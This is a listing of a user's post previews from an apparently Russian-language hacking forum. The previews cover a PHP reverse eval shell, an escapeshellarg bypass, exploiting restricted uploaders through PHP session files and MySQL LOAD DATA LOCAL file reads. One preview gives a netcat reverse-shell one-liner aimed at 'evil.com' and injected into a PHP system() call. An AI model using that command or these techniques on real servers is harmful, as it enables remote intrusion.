Раздел: Релизы/Releases
08.04.2015, 05:58
|
|
Ответов: 1
Просмотров: 21,638
PHP reverse eval shell
Сделан для прокидывания через RCE при ограничениях exec() и подобному.
Использует только fsockopen и eval
Форкается если есть pcntl_fork
set_time_limit(0);
if...
|
|
Раздел: Статьи/Articles
06.05.2014, 12:09
|
|
Ответов: 16
Просмотров: 56,980
|
|
Раздел: Web-среда/Web-applications
26.07.2013, 17:20
|
|
Ответов: 3,618
Просмотров: 3,275,295
|
|
Раздел: Повышение привилегий/Privilege escalation
06.06.2013, 10:14
|
|
Ответов: 11
Просмотров: 19,614
|
|
Раздел: Мировые новости/World news
03.05.2013, 01:11
|
|
Ответов: 0
Просмотров: 12,081
PHDays 2013 hackquest
Кто еще не в курсе, вот здесь:
hackquest.phdays.com (http://hackquest.phdays.com)
розыгрываются 20 билетов и 20 фирменных футболок PHDays 2013, который пройдет в Москве 23-24 мая
Всем удачи!
|
|
Раздел: Web-среда/Web-applications
25.04.2013, 19:10
|
|
Ответов: 3,618
Просмотров: 3,275,295
|
|
Раздел: Уязвимости PHP/PHP vulnerabilities
03.04.2013, 13:19
|
|
Ответов: 4
Просмотров: 17,022
Exploiting restricted uploaders
In many...
Exploiting restricted uploaders
In many cases uploader vulns restricted by filesystem privileges.
You can upload arbitrary files in /tmp directory, but can't upload into /var/www and others.
...
|
|
Раздел: Уязвимости PHP/PHP vulnerabilities
02.04.2013, 12:53
|
|
Ответов: 4
Просмотров: 17,022
|
|
Раздел: Уязвимости PHP/PHP vulnerabilities
31.03.2013, 22:04
|
|
Ответов: 4
Просмотров: 17,022
Эксплуатация ограниченных писалок через PHP сессии
Часто бывают случаи, когда надо проэксплуатировать ограниченные по правам аплоадеры и прочие штуки.
Для этого хорошо подходят файлы сессий, так как они располагаются в писабельной зоне (обычно /tmp)...
|
|
Раздел: Уязвимости PHP/PHP vulnerabilities
24.03.2013, 22:29
|
|
Ответов: 1
Просмотров: 19,037
|
|
Раздел: Уязвимости PHP/PHP vulnerabilities
15.03.2013, 02:29
|
|
Ответов: 1
Просмотров: 19,037
PHP escapeshellarg bypass 0day :)
Очевидная и действенная мера.
В РНР нет способа штатными средствами защититься от атак RCE через вызов exec консольных утилит, которые парсят параметры.
То есть escapeshellarg корректно делает из...
|
|
Раздел: Windows
13.03.2013, 21:34
|
|
Ответов: 12
Просмотров: 26,177
|
|
Раздел: Web-среда/Web-applications
11.03.2013, 23:56
|
|
Ответов: 3,618
Просмотров: 3,275,295
|
|
Раздел: Web-среда/Web-applications
03.03.2013, 07:39
|
|
Ответов: 11
Просмотров: 24,154
|
|
Раздел: Web-среда/Web-applications
03.03.2013, 07:35
|
|
Ответов: 11
Просмотров: 24,154
l1ght, b3, спасибо вам, вы поняли задачу!
...
l1ght, b3, спасибо вам, вы поняли задачу!
Еще раз для уточнения - ищется sh-based shell, то есть RCE готовая, но надо прокинуть шелл в одну команду.
В жизни очень часто бывает, когда твои кластер...
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
01.03.2013, 15:23
|
|
Ответов: 11
Просмотров: 43,342
Она работает в MySQL клиенте под PHP, ей вообще...
Она работает в MySQL клиенте под PHP, ей вообще пофигу на MySQL сервепр почти. Файло чистается с правами PHP.
Сначала был mysqli, потом mysqlnd стал (5.3 точно по-дефолту, раньше как настроишь). В...
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
01.03.2013, 14:00
|
|
Ответов: 11
Просмотров: 43,342
|
|
Раздел: Web-среда/Web-applications
28.02.2013, 13:28
|
|
Ответов: 11
Просмотров: 24,154
|
|
Раздел: Web-среда/Web-applications
28.02.2013, 12:26
|
|
Ответов: 11
Просмотров: 24,154
Короткий шелл
Задался целью написания короткого шелла для RCE типа
system("stat {$_GET['a']}");
пока самый простой вариант:
|nc evil.com 12345|sh|
|
|
Раздел: Оффтоп/Offtopic
27.02.2013, 18:13
|
|
Ответов: 6
Просмотров: 13,883
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
27.02.2013, 09:13
|
|
Ответов: 11
Просмотров: 43,342
Допы
- до 6ки оно включено на стороне сервера...
Допы
- до 6ки оно включено на стороне сервера (последние 5ки тоже выключены, не отследил)
- на стороне клиента включается в каждом конкретном случае по-своему, для РНР чаще всего включено
- чтение...
|
|
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers
24.02.2013, 18:17
|
|
Ответов: 5
Просмотров: 18,792
Это реально хороши известный факт, который...
Это реально хороши известный факт, который почему-то не особо описан.
То есть раздел "6.1.6. Security Issues with LOAD DATA LOCAL" черным по белому говорит о нем.
Какой странный ужас :)
|
